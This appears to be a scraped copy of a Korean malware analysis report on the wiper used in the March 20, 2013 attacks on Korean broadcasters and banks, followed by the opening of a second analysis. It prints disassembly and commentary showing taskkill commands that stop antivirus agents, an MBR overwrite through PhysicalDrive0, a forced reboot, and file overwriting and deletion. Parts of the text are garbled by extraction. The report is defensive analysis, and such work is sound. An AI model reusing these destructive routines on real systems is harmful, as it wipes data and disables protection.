CKKeyPro 적용가이드

Size: px

Start display at page:

Download "CKKeyPro 적용가이드"

나라 빈
5 years ago
Views:

1 3.20 사이버테러악성코드분석보고서 라온시큐어보안기술연구팀 작성일 : 페이지 : 1/15

Introduction 2013년 3월 20일오후, MBC, KBS, YTN, 농협, 신한은행, 제주은행전산망장애가동시에발생하였다. 피해기관들의호스트약 500여대에오류메시지가화면에나타났으며악성코드에감염된호스트는사용할수없는상태가되었다. 현재까지정확한침투경로가밝혀지지않고있다. 이와같은전산망장애를유발한악성코드를수집하여분석하였다.

2 Introduction 2013년 3월 20일오후, MBC, KBS, YTN, 농협, 신한은행, 제주은행전산망장애가동시에발생하였다. 피해기관들의호스트약 500여대에오류메시지가화면에나타났으며악성코드에감염된호스트는사용할수없는상태가되었다. 현재까지정확한침투경로가밝혀지지않고있다. 이와같은전산망장애를유발한악성코드를수집하여분석하였다. 분석결과피해시스템에설치된악성코드크게다음과같은기능을포함하고있다. 악성코드설치시스템시간확인 APC(Ahnlab Policy Center) Agent 프로세스강제종료 바이로봇 ISMS 프로세스강제종료 피해시스템파일파괴 시스템부트로드파괴 시스템재부팅 악성코드는위와같은기능을통해일정시간 (2013년 3월 20일 14시 00분 ) 이되면프로세스를종료하고시스템의부팅영역과파일을파괴한다. 이와같은행위가끝나면악성코드는강제로시스템을재부팅하는코드를실행한다. 하지만악성코드가이미시스템부팅에필요한주요영역을파괴했기때문에시스템이정상적으로사용할수없는상태가된다. 본문서는앞서언급한악성코드에대한정적 & 동적분석결과를담고있으며이번사이버테러에해당하는전체악성코드에대한분석보고서는아님을미리밝혀둔다. 페이지 : 2/15

3 General Infromation 1. AmAgent.exe File Name File Size MD5 Created AmAgent.exe Bytes 5fcd6e1dace6b d913850f :39 PM 2. ApcRunCmd.exe File Name ApcRunCmd.exe File Size Bytes MD5 db4bbdc36a78a8807ad9b15a562515c4 Created - 페이지 : 3/15

4 Time Calculation & Comparison 악성코드는 GetLocalTime 함수를호출하여현재날짜와시간을구하고주어진연산을수행한다. 연산의결과를비교하여 2013년 3월 20일 14시 00분이후에는 MBR 영역을덮어쓰는코드를실행한다. 그리고 2013년 3월 20일 14시 00분이전에는 Sleep 함수를호출하여대기한다. Step1. GetLocalTime(EAX) GetLocalTime() 함수를호출하여현재시간정보를구한다 C7 8D45 F0 LEA EAX,DWORD PTR SS:[EBP-10] CA CB FF CALL DWORD PTR DS:[ESI+330] ; kernel32.getlocaltime Step2. Time Calculation & Comparison EDX = Min * (Hour * (Day * (Month + Year % 100 * 100))) EDI = * ( * ( * ( % 100 * 100))) = 0x4DAD ED 0FB745 F0 MOVZX EAX,WORD PTR SS:[EBP-10] ; EAX = Year F1 99 CDQ F2 6A 64 PUSH 64 ; 0x64 = F4 59 POP ECX ; ECX = F5 F7F9 IDIV ECX ; % F7 0FB745 F2 MOVZX EAX,WORD PTR SS:[EBP-E] ; EAX = Month FB 6BD2 64 IMUL EDX,EDX,64 ; * FE 03D0 ADD EDX,EAX; FB745 F6 MOVZX EAX,WORD PTR SS:[EBP-A] ; EAX = Day BD2 64 IMUL EDX,EDX,64 ; * D0 ADD EDX,EAX FB745 F8 MOVZX EAX,WORD PTR SS:[EBP-8] ; EAX = Hour D 6BD2 64 IMUL EDX,EDX,64 ; * D0 ADD EDX,EAX FB745 FA MOVZX EAX,WORD PTR SS:[EBP-6] ; EAX = Min BD2 64 IMUL EDX,EDX,64 ; * D0 ADD EDX,EAX B 3BD7 CMP EDX,EDI D 7C B9 JL SHORT AmAgent D8 페이지 : 4/15

5 Process Kill taskkill /F /IM pasvc.exe 와 taskkill /F /IM Clisvc.exe 를인자로받아 WinExec 호출하여 pasvc.exe와 Clisvc.exe 프로세스를 Kill한다. Step1. WinExec( taskkill /F /IM pasvc.exe, 0) taskkill 명령을통해 pasvc.exe 프로세스를강제로종료한다. 이때 /F 옵션은프로세스를강제 로종료하라는것을의미하며 /IM 은종료할프로세스의이미지를지정하는옵션이다. taskkill 명 령을통해종료하는 pasvc.exe 프로세스는 AhnLab Policy Agent를의미한다 A 00 PUSH D LEA EAX,DWORD PTR DS:[ESI+518] A 8DBE LEA EDI,DWORD PTR DS:[ESI+394] ; taskkill /F /IM pasvc.exe FF17 CALL DWORD PTR DS:[EDI] ; kernel32.winexec Step2. WinExec( taskkill /F /IM Clisvc.exe, 0) taskkill 명령을통해 Clisvc.exe 프로세스를강제로종료한다. 종료하는 Clisvc.exe는 Hauri의 ViRoboot ISMS를의미한다 A 00 PUSH C ADD ESI, B 56 PUSH ESI ; taskkill /F /IM Clisvc.exe C FF17 CALL DWORD PTR DS:[EDI] ; kernel32.winexec 페이지 : 5/15

6 MBR Overwrite 악성코드는 2013년 3월 20일 14시 00분이후에는 MBR 영역을 HASTATI. 이라는문자가반복되는문자열을생성하고 MBR 영역을덮어쓴다. 이로인해 MBR 영역이파괴되고이후재부팅하는코드실행으로인해시스템은정상적으로부팅할수없게된다. Step1. CreateFileA( \\.\PhysicalDrive0, 0xC , 3, NULL, 3, 0, NULL) MBR 영역으로의접근을위해 \\.\PhysicalDrive0 를인자로 CreateFileA() 함수를호출한다 DE2 57 PUSH EDI 00401DE3 57 PUSH EDI 00401DE4 6A 03 PUSH DE6 57 PUSH EDI 00401DE7 6A 03 PUSH DE C0 PUSH C DEE 8D85 F8FEFFFF LEA EAX,DWORD PTR SS:[EBP-108] 00401DF4 50 ; \\.\PhysicalDrive DF5 FF CALL DWORD PTR DS:[ESI+370] ; kernel32.createfilea Step2. memcpy(eax, eax, strlen(eax)) memcpy() 함수를호출하여 HASTATI. 문자열 * 60 복사 (0x1E0 size) 을메모리에복사한다 B POP EBX ; 0x3C D45 F4 LEA EAX,DWORD PTR SS:[EBP-C] FF96 AC CALL DWORD PTR DS:[ESI+3AC] ; msvcrt.strlen E F 8D45 F4 LEA EAX,DWORD PTR SS:[EBP-C] D843D F4FDFF LEA EAX,DWORD PTR SS:[EBP+EDI-20C] A B FF96 A CALL DWORD PTR DS:[ESI+3A8] ; msvcrt.memcpy D45 F4 LEA EAX,DWORD PTR SS:[EBP-C] FF96 AC CALL DWORD PTR DS:[ESI+3AC] ; msvcrt.strlen B 83C4 14 ADD ESP, E 03F8 ADD EDI,EAX 페이지 : 6/15

7 004020A0 4B A1 75 D1 DEC EBX JNZ SHORT AmAgent Step3. WriteFile(Handle, HASTATI. * 60, 0x200, EAX, NULL) SetFilePointer() 함수를호출하여 PhysicalDrive0의 0번째주소로이동하여 MBR 영역을가리키도 록한다. 그리고 WriteFile() 를호출하여 MBR 영역을 HASTATI. 라는문자열로덮어쓴다 E2 FF CALL DWORD PTR DS:[EDI+380] ; kernel32.setfilepointer E8 3BC6 CMP EAX,ESI EA JE SHORT AmAgent F EC 33C0 XOR EAX,EAX EE EB 1D JMP SHORT AmAgent D F0 6A 00 PUSH F2 8D45 FC LEA EAX,DWORD PTR SS:[EBP-4] F F PUSH FB FF75 10 PUSH DWORD PTR SS:[EBP+10] ; HASTATI.HASTATI FE FF77 40 PUSH DWORD PTR DS:[EDI+40] ; 0x FF CALL DWORD PTR DS:[EDI+374] ; kernel32.writefile 페이지 : 7/15

8 Shutdown 악성코드는 MBR 영역을덮어쓰고최종적으로시스템을 Shutdown 시키는코드를수행한다. Step1. Sleep(300000) Shutdown 코드를실행하기이전에 Sleep 함수를호출하며이때, Sleep 함수의인자로 0x493E0( Milliseconds) 를전달함으로써 PC 재부팅이전에잠시대기한다 E PUSH 493E FF CALL DWORD PTR DS:[ESI+334] ; kernel32.sleep F 56 PUSH ESI FF96 B CALL DWORD PTR DS:[ESI+2B0] ; Call step2 Step2. WinExec( shutdown r t 0, 0) WinExec 함수에 shutdown r t 0 을인자로넘겨악성코드에감염된 PC를재부팅한다. 이때 shutdown 명령어의인자로전달하는 r 옵션이 PC의재부팅을의미한다 B MOV EAX,DWORD PTR SS:[ESP+4] A 00 PUSH B 8D LEA ECX,DWORD PTR DS:[EAX+507] ; "shutdown -r -t 0" PUSH ECX FF CALL DWORD PTR DS:[EAX+394] ; kernel32.winexec C0 XOR EAX,EAX A 40 INC EAX B C3 RETN 페이지 : 8/15

9 File Overwrite 악성코드는 B:\ 드라이브부터순차적으로드라이브의타입을확인한다. 드라이브타입이 DRIVE_REMOVABLE 또는 DRIVE_FIXED일경우하위디렉토리를검색하고각파일의경로를추출한다. 추출한경로가시스템디렉토리, Program Files, ProgramData 인지확인한다. 이와같은경로에해당하지않는경우파일의일부분을 HASTATI. 라는문자열로덮어쓴다. 파일각각에대해덮어쓰는과정이끝나면파일을삭제한다. Step1. GetDriveType(EAX = DrivePathName) GetDriveType() 함수를호출할때, Root 디렉토리경로를인자로전달하여해당드라이브의타입 을판별한다. 드라이브의타입은 GetDriveType() 함수리턴값으로확인할수있으며리턴값의 범위는 0x00 ~ 0x06까지이다. 함수를호출할때, 인자로전달하는 Root 디렉토리경로는 B:\ 를 시작으로문자 B 에해당하는 ASCII Code 값을순차적으로증가시키면서 B(0x42):\ -> C(0x43):\ 순서로 GetDriveType() 함수의인자로전달한다 C 8D86 B504 LEA EAX,DWORD PTR DS:[ESI+4B5] ; EAX = "B:\" D45 F8 LEA EAX,DWORD PTR SS:[EBP-8] FF96 A403 CALL DWORD PTR DS:[ESI+3A4] ; msvcrt.strcpy("b:\", 0060FF80) D BF MOV EDI, PUSH EDI ; EDI = 0x D85 ECFD LEA EAX,DWORD PTR SS:[EBP-214] A 00 PUSH B C FF96 A003 CALL DWORD PTR DS:[ESI+3A0] ; msvcrt.memset(0060fd74, 0) A2 33DB XOR EBX,EBX A4 83C4 20 ADD ESP, A7 43 INC EBX A8 895E 0C MOV DWORD PTR DS:[ESI+C],EBX AB 895D 08 MOV DWORD PTR SS:[EBP+8],EBX AE E9 2B0100 JMP AmAgent DE B3 837D 08 1 CMP DWORD PTR SS:[EBP+8], B7 0F8D 3001 JGE AmAgent ED BD 8D45 F8 LEA EAX,DWORD PTR SS:[EBP-8] C0 50 ; EAX = Drive Path Name 페이지 : 9/15

10 004013C1 FF CALL DWORD PTR DS:[ESI+354] ; kernel32.getdrivetypea() Step2. Drive Type Comparison GetDriveTypeA() 함수의호출결과 0x3(DRIVE_FIXED) 인지 0x2(DRIVE_REMOVABLE) 인지비교한다 C7 83F8 03 CMP EAX,3 ; IF EAX = DRIVE_FIXED CA JE SHORT AmAgent D CC 83F8 02 CMP EAX,2 ; IF EAX = DRIVE_REMOVABLE CF 0F JNZ AmAgent D8 Step3. IF Not DRIVE_FIXED or Not DRIVE_REMOVABLE, Next Drive Path Name 드라이브타입이 DRIVE_FIXED 또는 DRIVE_REMOVABLE이아닌경우다음드라이브의타입확인 을위해 B:\ 중, B 의 ASCII 값을증가시킨다 D8 FE45 F8 INC BYTE PTR SS:[EBP-8] Next Drive(Ex. "B:\"->"C:\") DB FF45 08 INC DWORD PTR SS:[EBP+8] DE 0FBE45 F8 MOVSX EAX,BYTE PTR SS:[EBP-8] E2 3D CMP EAX, ; EAX = Drive Character E7^ 0F8C C6FE JL AmAgent B3 Step4. kernel32.findfirstfilea( C:\*.*, 0x0060FBFC) - File Search FindFirstFileA() 함수호출을통해드라이브내에있는파일을검색한다. 이때 FindFirstFileA() 함수 의인자로 C:\*.* 를전달함으로써 C:\ 아래에있는모든파일을검색하도록한다 FF75 0C PUSH DWORD PTR SS:[EBP+C] ; push "C:\" D86 BE04 LEA EAX,DWORD PTR DS:[ESI+4BE] E 50 ; EAX = "%s*.*" F 8D85 94F7 LEA EAX,DWORD PTR SS:[EBP-86C] A5 50 ; EAX = 0x00x0F4D A6 FF96 B403 CALL DWORD PTR DS:[ESI+3B4] ; msvcrt.sprintf(0x0060f4d8, "%s*.*", "C:\") AC 83C4 0C ADD ESP,0C AF 8D85 B8FE LEA EAX,DWORD PTR SS:[EBP-148] B B6 8D85 94F7 LEA EAX,DWORD PTR SS:[EBP-86C] BC BD 5C03 CALL DWORD PTR DS:[ESI+35C] ; kernel32.findfirstfilea("c:\*.*", 0x0060FBFC) Step5. Path String Generation1 페이지 : 10/15

11 파일검색과정에서파일의경로의비교를위해필요한문자열을생성한다 PUSH D85 A0F9 LEA EAX,DWORD PTR SS:[EBP-660] D 6A 00 PUSH F FF96 A003 CALL DWORD PTR DS:[ESI+3A0] FF75 0C PUSH DWORD PTR SS:[EBP+C] ; push "C:\" D85 A0F9 LEA EAX,DWORD PTR SS:[EBP-660] F 50 ; EAX = 0x0060F6E FF96 A403 CALL DWORD PTR DS:[ESI+3A4] ; msvcrt.strcpy(0x0060f6e4, "C:\") D85 E4FE LEA EAX,DWORD PTR SS:[EBP-11C] C 50 ; EAX = Path D 8D85 A0F9 LEA EAX,DWORD PTR SS:[EBP-660] ; EAX = "C:\" FF96 B003 CALL DWORD PTR DS:[ESI+3B0] ; msvcrt.strcat("c:\", Path) A 8D9E B904 LEA EBX,DWORD PTR DS:[ESI+4B9] D85 A0F9 LEA EAX,DWORD PTR SS:[EBP-660] PUSH EBX ; EBX = "\" ; EAX = "C:\" + Path FF96 B003 CALL DWORD PTR DS:[ESI+3B0] ; msvcrt.strcat("\", Path) Step6. Path String Generation2 또한검색하고있는경로가시스템경로인지또는 Program Files, ProgramData 인지비교하기 위해필요한문자열을생성한다. C:\Windows C:\Program Files C:\ProgramData BF 8D85 B4FD LEA EAX,DWORD PTR SS:[EBP-24C] C C6 FF CALL DWORD PTR DS:[ESI+360] ; kernel32.getwindowsdirectorya(0x0060faf8, 0x104) CC 8D85 B4FD LEA EAX,DWORD PTR SS:[EBP-24C] D2 53 PUSH EBX ; EBX = "\" D3 50 ; EAX = "C:\Windows" D4 FF96 B003> CALL DWORD PTR DS:[ESI+3B0] ; msvcrt.stract("c:\windows", "\") 페이지 : 11/15

12 004017DA 6A 03 PUSH DC 8D85 B4FD LEA EAX,DWORD PTR SS:[EBP-24C] E E3 8D85 B0FC LEA EAX,DWORD PTR SS:[EBP-350] E EA FF96 A803 CALL DWORD PTR DS:[ESI+3A8] ; msvcrt.memcpy(0x0060f9f4, "C:\Windows\", 3) F0 8D86 C404 LEA EAX,DWORD PTR DS:[ESI+4C4] F6 50 ; EAX = "Program Files" F7 8D85 B0FC LEA EAX,DWORD PTR SS:[EBP-350] FD 50 ; EAX = "C:\" FE FF96 B003 CALL DWORD PTR DS:[ESI+3B0] ; msvcrt.stract("c:\", "Program Files") D85 B0FC LEA EAX,DWORD PTR SS:[EBP-350] A 53 PUSH EBX ; EBX = "\" B 50 ; EAX = "C:\Program Files" C FF96 B003 CALL DWORD PTR DS:[ESI+3B0] ; msvcrt.stract("c:\program Files", "\") A 03 PUSH D85 B4FD LEA EAX,DWORD PTR SS:[EBP-24C] A 50 ; EAX = "C:\Windows" B 8D85 ACFB LEA EAX,DWORD PTR SS:[EBP-454] ; EAX = 0x0060F8F FF96 A803 CALL DWORD PTR DS:[ESI+3A8] ; msvcrt.memcpy(0x0060f8f0, "C:\Window", 3) D86 D204 LEA EAX,DWORD PTR DS:[ESI+4D2] E 50 ; EAX = "ProgramData" F 8D85 ACFB LEA EAX,DWORD PTR SS:[EBP-454] ; EAX = "C:\" FF96 B003 CALL DWORD PTR DS:[ESI+3B0] ; msvcrt.stract("c:\", "ProgramData") C 8D85 ACFB LEA EAX,DWORD PTR SS:[EBP-454] PUSH EBX ; EBX = "\" ; EAX = "C:\ProgramData" FF96 B003 CALL DWORD PTR DS:[ESI+3B0] ; msvcrt.stract("c:\programdtata", "\") Step7. Path Comparison 앞서생성한경로들을 strcmp 함수를통해비교한다. 페이지 : 12/15

13 D 8D85 B4FD LEA EAX,DWORD PTR SS:[EBP-24C] ; EAX = "C:\Windows\" D85 A0F9 LEA EAX,DWORD PTR SS:[EBP-660] A 50 ; EAX = Path B FF96 B803 CALL DWORD PTR DS:[ESI+3B8] ; msvcrt.strcmp("c:\windows\", Path) POP ECX POP ECX C0 TEST EAX,EAX F84 F200 JE AmAgent D B 8D85 B0FC LEA EAX,DWORD PTR SS:[EBP-350] ; EAX = "C:\Program Files\" D85 A0F9 LEA EAX,DWORD PTR SS:[EBP-660] ; EAX = Path FF96 B803 CALL DWORD PTR DS:[ESI+3B8] ; msvcrt.strcmp("c:\program Files", Path) F 59 POP ECX POP ECX C0 TEST EAX,EAX F84 D400 JE AmAgent D D85 ACFB LEA EAX,DWORD PTR SS:[EBP-454] F 50 ; EAX = "C:\ProgramData" D85 A0F9 LEA EAX,DWORD PTR SS:[EBP-660] ; EAX = Path FF96 B803 CALL DWORD PTR DS:[ESI+3B8] ; msvcrt.strcmp("c:\programdata", Path) Step8. FileOpen FindFirstFileA(), FindNextFileA() 함수호출을통해얻은파일이름을 CreateFile() 함수에인자로전달하여파일의 Handle을구한다. 이때, CreateFile() 함수에전달하는인자중 0xC 는 Read 와 Write가가능한상태로파일을오픈하는것을의미한다. 0xC : Generic read and generic write 3 : FILE_SHARE_READ, FILE_SHARE_WRITE lpsecurityattributes = 0 : NULL dwcreationdisposition = 3 : OPEN_EXISTING dwflagsandattributes = 0 : 0x0 htemplatefile = 0 : NULL 페이지 : 13/15

14 004019AF FF75 10 PUSH DWORD PTR SS:[EBP+10] ; push Filename B2 8D86 DE04 LEA EAX,DWORD PTR DS:[ESI+4DE] B8 FF75 0C PUSH DWORD PTR SS:[EBP+C] ; push Path BB 50 ; EAX = "%s%s" BC 8D85 ECFD LEA EAX,DWORD PTR SS:[EBP-214] C C3 FF96 B403 CALL DWORD PTR DS:[ESI+3B4] ; msvcrt.sprintf(0x0060e184, %s%s, Path, Name) C9 83C4 1C ADD ESP,1C CC 53 PUSH EBX ; EBX = CD 53 PUSH EBX CE 6A 03 PUSH D0 53 PUSH EBX D1 6A 03 PUSH D PUSH C D8 8D85 ECFD LEA EAX,DWORD PTR SS:[EBP-214] DE DF FF CALL DWORD PTR DS:[ESI+370] ; kernew32.createfilea(filepath, 0xC , 3, 0, 3, 0, 0) Step9. File Overwrite CreateFileA() 함수를통해구한파일 Handle을구하고 WriteFile() 함수를호출하여 Handle에해 당하는파일에 HASTATI. 문자열을 1023 바이트만큼덮어쓴다. WriteFile() 함수를통해덮어쓰 고난후, SetFilePoint() 함수를호출하여 File Pointer를 0x18F9C = 만큼이동하고다시 WriteFile() 를호출하여 HASTATI. 문자열을덮어쓰는과정을계속한다 A17 53 PUSH EBX ; EBX = 0x A18 8D45 F8 LEA EAX,DWORD PTR SS:[EBP-8] 00401A1B 50 ; EAX = 0x0060E A1C 57 PUSH EDI ; EDI = 0x3FF = A1D 8D85 E0F9 LEA EAX,DWORD PTR SS:[EBP-620] 00401A23 50 ; EAX = 0x0060DD78 = "HASTATI..." 00401A24 FF75 08 PUSH DWORD PTR SS:[EBP+8] ; FileHandle 00401A27 FF CALL DWORD PTR DS:[ESI+374] ; kernel32.writefile(filehandle, "HASTATI...", 0x3FF, 0x0060E390, 0x0)) 00401A37 6A 01 PUSH A39 53 PUSH EBX ; EBX = A3A 50 ; EAX = 0x00018F9C 페이지 : 14/15

15 00401A3B FF75 08 PUSH DWORD PTR SS:[EBP+8] ; FileHandle 00401A3E FF CALL DWORD PTR DS:[ESI+380] ; kernel32.setfilepointer(filehandle, 0x18F9C, 0, 1) Step10. File Delete 파일을덮어쓰는과정이끝나면 DeleteFileA() 함수를호출하여해당파일을삭제한다 A5B 8D85 ECFD LEA EAX,DWORD PTR SS:[EBP-214] 00401A61 50 ; EAX = FilePath 00401A62 FF96 7C03 CALL DWORD PTR DS:[ESI+37C] ; kernel32.deletefilea(filepath) 페이지 : 15/15

3.20 테러 악성코드바이너리분석 손충호 (StolenByte) WOWHACKER Group 해당문서는 WOWHACKER Group 의문서이므로, 무단도용및수 정및변조는할수없습니다. 페이지 1 / 20

3.20 테러 악성코드바이너리분석 손충호 (StolenByte) stolenbyte@wowhacker.org WOWHACKER Group 2013-03-20 해당문서는 WOWHACKER Group 의문서이므로, 무단도용및수 정및변조는할수없습니다. 페이지 1 / 20 전체적인공격프로세스 페이지 2 / 20 1. 바이너리가사용할 LoadLibrary 하여함수 Load